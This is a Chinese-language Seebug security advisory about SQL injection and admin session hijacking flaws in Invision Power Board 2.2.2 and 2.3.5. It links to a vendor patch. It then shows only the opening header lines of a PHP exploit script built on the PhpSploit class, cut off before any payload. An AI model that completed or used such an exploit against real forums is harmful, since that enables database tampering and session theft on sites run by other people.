Invision Power Board多个远程安全漏洞

2008-09-01T00:00:00
ID SSV:3952
Type seebug
Reporter Root
Modified 2008-09-01T00:00:00

Description

BUGTRAQ ID: 30921 CNCAN ID:CNCAN-2008090103

Invision Power Board是一款基于PHP的WEB论坛程序。 Invision Power Board存在多个安全问题,远程攻击者可以利用漏洞访问或修改数据,操作数据库等攻击。 存在的漏洞包括SQL注入,管理会话劫持等攻击。

Invision Power Services Invision Power Board 2.3.5 Invision Power Board Invision Power Board 2.2.2 Invision Power Board SQL相关注入漏洞可参考如下补丁: <a href=http://forums.invisionpower.com/index.php?showtopic=276512 target=_blank>http://forums.invisionpower.com/index.php?showtopic=276512</a>

                                        
                                            
                                                #!/usr/bin/php -q
&lt;?php
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
##################################################
error_reporting(E_ALL ^ E_NOT